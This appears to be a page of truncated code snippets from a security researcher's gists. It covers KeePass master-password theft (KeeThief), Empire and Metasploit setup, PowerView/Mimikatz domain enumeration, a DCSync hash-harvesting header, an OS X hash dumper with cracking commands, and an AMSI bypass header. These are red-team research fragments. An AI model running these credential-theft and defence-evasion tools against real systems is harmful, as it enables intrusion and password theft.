HarmJ0y

A few clarification points for the "KeeThief – A Case Study in Attacking KeePass Part 2" post:

1. KeeThief doesn't require local administrator rights, only rights to access the KeePass.exe process space you're targeting.

2. KeeThief.ps1 is fully-self self-contained (no dependencies and no files dropped to disk) and PowerShell Version 2 compliant (so it will work on Windows 7+).

3. Secure desktop doesn't matter/come into play as a keylogger isn't used or needed.

4. This approach is different from KeeFarce - KeeThief recovers the plaintext master password and other key material from memory instead of calling internal methods to export the database contents.

HarmJ0y

# start empire headless with the specified API username and password
./empire --headless --username empireadmin --password 'Password123!'

# login and the current server token
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/admin/login -X POST -d '{"username":"empireadmin", "password":"Password123!"}'

# store the token in a variable
TOKEN=<API_token>

# see listener options

HarmJ0y

# import PowerView and Invoke-Mimikatz
Import-Module .\powerview.ps1
Import-Module .\mimikatz.ps1

# map all reachable domain trusts
Invoke-MapDomainTrust

# enumerate groups with 'foreign' users users, and convert the foreign principal SIDs to names
Find-ForeignGroup -Domain external.local
Find-ForeignGroup -Domain external.local | Select-Object -ExpandProperty UserName | Convert-SidToName

HarmJ0y

function Invoke-DCSync
{
<#
.SYNOPSIS

Uses dcsync from mimikatz to collect NTLM hashes from the domain.

Author: @monoxgas

Invoke-ReflectivePEInjection

HarmJ0y

#!/bin/bash

sudo apt-get install git
cd /tmp/
git clone https://github.com/darkoperator/MSF-Installer.git
cd MSF-Installer
sudo ./msf_install.sh -i
source ~/.bashrc
sudo chmod 0666 /usr/local/share/metasploit-framework/log/production.log

HarmJ0y

function Find-KeePassconfig {
<#
    .SYNOPSIS

        Finds and parses any KeePass.config.xml (2.X) and KeePass.ini (1.X) files.

        Author: @harmj0y
        License: BSD 3-Clause
        Required Dependencies: None
        Optional Dependencies: None

HarmJ0y

#!/usr/bin/python

# extracts OSX user hashes and outputs a format crackable with oclHashcat
#   adapted from http://apple.stackexchange.com/questions/186893/os-x-10-9-where-are-password-hashes-stored
#   and https://web.archive.org/web/20140703020831/http://www.michaelfairley.co/blog/2014/05/18/how-to-extract-os-x-mavericks-password-hash-for-cracking-with-hashcat/
#
#   automation of approach by @harmj0y
#
#   sudo ./osx_hashdump.py
#   ./oclHashcat64.bin -m 7100 hash.txt wordlist.txt

HarmJ0y

#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H

#include <windows.h>

static const int AMSI_RESULT_CLEAN = 0;

PVOID g_amsiScanBufferPtr = nullptr;

unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {

HarmJ0y

function ConvertTo-Rc4ByteStream {
<#
    .SYNOPSIS

        Converts an input byte array to a RC4 cipher stream using the specified key.

        Author: @harmj0y
        License: BSD 3-Clause
        Required Dependencies: None
        Optional Dependencies: None

HarmJ0y

function Get-NonstandardService {
<#
.SYNOPSIS

Returns services where the associated binaries are either not signed, or are
signed by an issuer not matching 'Microsoft'.

Author: Will Schroeder (@harmj0y)  
License: BSD 3-Clause  
Required Dependencies: None